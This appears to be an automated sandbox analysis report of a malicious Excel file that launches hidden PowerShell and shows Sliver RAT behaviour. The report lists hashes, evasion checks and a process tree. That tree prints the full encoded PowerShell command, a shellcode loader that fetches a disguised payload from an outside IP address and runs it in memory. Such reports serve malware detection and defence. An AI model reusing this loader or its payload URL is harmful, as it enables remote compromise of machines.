Analysis
-
max time kernel
56s -
max time network
62s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
10-11-2024 21:53
Behavioral task
behavioral1
Sample
4ec853d9972a4da2aee5ceb0d7820b0bf419a26f0e2a90d06e9562ae80d94a31.xls
Resource
win7-20241010-en
General
-
Target
4ec853d9972a4da2aee5ceb0d7820b0bf419a26f0e2a90d06e9562ae80d94a31.xls
-
Size
46KB
-
MD5
8b242d19bd9a2b1186f4ef8de0c4ffa2
-
SHA1
ac9651800cf0296ef5f545b18eca8b72cf40c9ca
-
SHA256
4ec853d9972a4da2aee5ceb0d7820b0bf419a26f0e2a90d06e9562ae80d94a31
-
SHA512
89f4221b4eb13128f568dc118c5bf171d9d955e474fec94d8a5139af1afcd4d42a3949aeb32f151178a8168f42885ecf10b6046d68951386df8580d3f1bc565a
-
SSDEEP
768:r4SFsv66g3KnF439NKC54kkGfn+cL2XdA8YRtukODXwXqt7sNAQYzKEm8ZRu9Uzp:8SFsv66g3KnF439NKC54kkGfn+cL2Xd+
Malware Config
Extracted
https://194.182.164.149:8080/fontawesome.woff
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
powershell.exedescription pid pid_target Process procid_target Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 2760 3248 powershell.exe 85 -
Sliver RAT v2 6 IoCs
Processes:
resource yara_rule behavioral2/memory/2760-64-0x000001B8BD290000-0x000001B8BDD0E000-memory.dmp SliverRAT_v2 behavioral2/memory/2760-65-0x000001B8BE790000-0x000001B8BF276000-memory.dmp SliverRAT_v2 behavioral2/memory/2760-67-0x000001B8BE790000-0x000001B8BF276000-memory.dmp SliverRAT_v2 behavioral2/memory/2760-66-0x000001B8BE790000-0x000001B8BF276000-memory.dmp SliverRAT_v2 behavioral2/memory/2760-68-0x000001B8BE790000-0x000001B8BF276000-memory.dmp SliverRAT_v2 behavioral2/memory/2760-76-0x000001B8BE790000-0x000001B8BF276000-memory.dmp SliverRAT_v2 -
Sliver family
-
Blocklisted process makes network request 24 IoCs
Processes:
powershell.exeflow pid Process 19 2760 powershell.exe 21 2760 powershell.exe 24 2760 powershell.exe 28 2760 powershell.exe 29 2760 powershell.exe 30 2760 powershell.exe 36 2760 powershell.exe 37 2760 powershell.exe 38 2760 powershell.exe 39 2760 powershell.exe 40 2760 powershell.exe 41 2760 powershell.exe 42 2760 powershell.exe 48 2760 powershell.exe 54 2760 powershell.exe 57 2760 powershell.exe 58 2760 powershell.exe 59 2760 powershell.exe 60 2760 powershell.exe 61 2760 powershell.exe 62 2760 powershell.exe 63 2760 powershell.exe 64 2760 powershell.exe 65 2760 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
-
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
EXCEL.EXEdescription ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
EXCEL.EXEdescription ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
EXCEL.EXEpid Process 3248 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powershell.exepid Process 2760 powershell.exe 2760 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid Process Token: SeDebugPrivilege 2760 powershell.exe -
Suspicious use of SetWindowsHookEx 12 IoCs
Processes:
EXCEL.EXEpid Process 3248 EXCEL.EXE 3248 EXCEL.EXE 3248 EXCEL.EXE 3248 EXCEL.EXE 3248 EXCEL.EXE 3248 EXCEL.EXE 3248 EXCEL.EXE 3248 EXCEL.EXE 3248 EXCEL.EXE 3248 EXCEL.EXE 3248 EXCEL.EXE 3248 EXCEL.EXE -
Suspicious use of WriteProcessMemory 6 IoCs
Processes:
EXCEL.EXEpowershell.execsc.exedescription pid Process procid_target PID 3248 wrote to memory of 2760 3248 EXCEL.EXE 90 PID 3248 wrote to memory of 2760 3248 EXCEL.EXE 90 PID 2760 wrote to memory of 2576 2760 powershell.exe 92 PID 2760 wrote to memory of 2576 2760 powershell.exe 92 PID 2576 wrote to memory of 4820 2576 csc.exe 94 PID 2576 wrote to memory of 4820 2576 csc.exe 94
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\4ec853d9972a4da2aee5ceb0d7820b0bf419a26f0e2a90d06e9562ae80d94a31.xls"1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3248 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -nop -w hidden -Enc JABXAGkAbgAzADIAIAA9ACAAQAAiAA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwA7AA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFcAaQBuADMAMgAgAHsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAiACkAXQANAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAANAAoAIAAgACAAIAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAANAAoAIAAgACAAIAB1AGkAbgB0ACAAZgBsAEEAbABsAG8AYwBhAHQAaQBvAG4AVAB5AHAAZQAsAA0ACgAgACAAIAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAiACwAIABDAGgAYQByAFMAZQB0AD0AQwBoAGEAcgBTAGUAdAAuAEEAbgBzAGkAKQBdAA0ACgBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgADQAKACAAIAAgACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQAQQB0AHQAcgBpAGIAdQB0AGUAcwAsAA0ACgAgACAAIAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAANAAoAIAAgACAAIABJAG4AdABQAHQAcgAgAGwAcABTAHQAYQByAHQAQQBkAGQAcgBlAHMAcwAsAA0ACgAgACAAIAAgAEkAbgB0AFAAdAByACAAbABwAFAAYQByAGEAbQBlAHQAZQByACwADQAKACAAIAAgACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwADQAKACAAIAAgACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQASQBkACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgAsACAAUwBlAHQATABhAHMAdABFAHIAcgBvAHIAPQB0AHIAdQBlACkAXQANAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAVQBJAG4AdAAzADIAIABXAGEAaQB0AEYAbwByAFMAaQBuAGcAbABlAE8AYgBqAGUAYwB0ACgADQAKACAAIAAgACAASQBuAHQAUAB0AHIAIABoAEgAYQBuAGQAbABlACwADQAKACAAIAAgACAAVQBJAG4AdAAzADIAIABkAHcATQBpAGwAbABpAHMAZQBjAG8AbgBkAHMAKQA7AA0ACgB9AA0ACgAiAEAADQAKAEEAZABkAC0AVAB5AHAAZQAgACQAVwBpAG4AMwAyAA0ACgANAAoAIwAgAEkAUwBDAHsAaABlAGMAYQByAG0AZQBuAF8AdwBhAHMAXwBoAGUAcgBlAH0ADQAKAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAHIAdgBlAHIAQwBlAHIAdABpAGYAaQBjAGEAdABlAFYAYQBsAGkAZABhAHQAaQBvAG4AQwBhAGwAbABiAGEAYwBrACAAPQAgAHsAJAB0AHIAdQBlAH0AIAA7AA0ACgAkAHMAaABlAGwAbABjAG8AZABlACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAEwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAKAAiAGgAdAB0AHAAcwA6AC8ALwAxADkANAAuADEAOAAyAC4AMQA2ADQALgAxADQAOQA6ADgAMAA4ADAALwBmAG8AbgB0AGEAdwBlAHMAbwBtAGUALgB3AG8AZgBmACIAKQANAAoAaQBmACAAKAAkAHMAaABlAGwAbABjAG8AZABlACAALQBlAHEAIAAkAG4AdQBsAGwAKQAgAHsARQB4AGkAdAB9ADsADQAKACQAcwBpAHoAZQAgAD0AIAAkAHMAaABlAGwAbABjAG8AZABlAC4ATABlAG4AZwB0AGgADQAKAA0ACgBbAEkAbgB0AFAAdAByAF0AJABhAGQAZAByACAAPQAgAFsAVwBpAG4AMwAyAF0AOgA6AFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgAMAAsACQAcwBpAHoAZQAsADAAeAAxADAAMAAwACwAMAB4ADQAMAApADsADQAKAFsAUwB5AHMAdABlAG0ALgBSAHUAbgB0AGkAbQBlAC4ASQBuAHQAZQByAG8AcABTAGUAcgB2AGkAYwBlAHMALgBNAGEAcgBzAGgAYQBsAF0AOgA6AEMAbwBwAHkAKAAkAHMAaABlAGwAbABjAG8AZABlACwAIAAwACwAIAAkAGEAZABkAHIALAAgACQAcwBpAHoAZQApAA0ACgAkAHQAaABhAG4AZABsAGUAPQBbAFcAaQBuADMAMgBdADoAOgBDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoADAALAAwACwAJABhAGQAZAByACwAMAAsADAALAAwACkAOwANAAoAWwBXAGkAbgAzADIAXQA6ADoAVwBhAGkAdABGAG8AcgBTAGkAbgBnAGwAZQBPAGIAagBlAGMAdAAoACQAdABoAGEAbgBkAGwAZQAsACAAWwB1AGkAbgB0ADMAMgBdACIAMAB4AEYARgBGAEYARgBGAEYARgAiACkA2⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2760 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\fz5m5l4m\fz5m5l4m.cmdline"3⤵
- Suspicious use of WriteProcessMemory
PID:2576 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE290.tmp" "c:\Users\Admin\AppData\Local\Temp\fz5m5l4m\CSC46B605F05C0F4918937378D688A97239.TMP"4⤵PID:4820
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD59c796bf758e8597b8938d3348daab8b6
SHA18a58a301c2ba43fa5dde07494cf0720273c2c179
SHA25667f480c13e65c81c768476fbb30a70e3afe3148157abcad5bfc26bf7fb43a765
SHA5129de44d5c9ea5fe13f158ef6c436a0fb1e700c8d0568e78d88649bf48cf4bc6cedee583e74f997794ae520c8e502a60515d45834321def7a26215bcc027d672a2
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
3KB
MD5fc3fa9fa3964cd63f2593dde90686223
SHA18f4720b0c9708326c5b1d0fafeed666a51ccf515
SHA256e591249684a2324ef6236c2eea78bb9baf58c575589dc5e36a152599de397072
SHA51246a46170e44d0494d65720fdb0efed7f28eefb15ae1287da3a7dd9b571c83cf3f3690eb769f2d3208fcc0763c4c3a482b55258ee49e560a0a924534770a6c230
-
Filesize
652B
MD5c6dce444bf55f21356e03a773307d068
SHA18e2cdd94195b2abd4de964df25ff460f85b3d961
SHA2565d3cc3abc75f9b49cb9a62369e26ba5446e6dea75adfe993b5a38be2859f1a82
SHA512764e47f2d499982e452ad4255f2c14c308ac58d4546187148edab0080e834b0f9ef4bc1e54b21101d7368ab3ba7eb6ee6d33cf1060bd3f53d55d0e3bec81fe07
-
Filesize
631B
MD5f4dd5c682eb7b3b679f084261bfc7c4c
SHA170f75d7a4e42c185eb09139ed3c6f7338a2219c2
SHA2562908bfece2edd241dc4f7cc26608c3254f7e5b896a38114618d56b65d4fc4319
SHA5128f91148a6bd15f8182ef00b3e75b008eacda414852e8169112013377e4b9b88e1a0be73c8e0c212b8c0a51c24fbb2849c44d742f6019c9c5bf0dfb0e28a1b83d
-
Filesize
369B
MD57d8a998c5b34aec3dc91cafa05c53151
SHA13b75b912838861f37fe4205dee89978a7258224e
SHA256539704862f38a2b1a7f09aade9b8838bcd12185548df9af97f0149286bf7bd80
SHA512f244cbe12931bf73c66b75260b037f3fd71d7627bcb6f4479a700a990699c3e8cc2984beaa23e7cde35c6bd87390b772d7a5792ec9a12f6e509de4620061db2b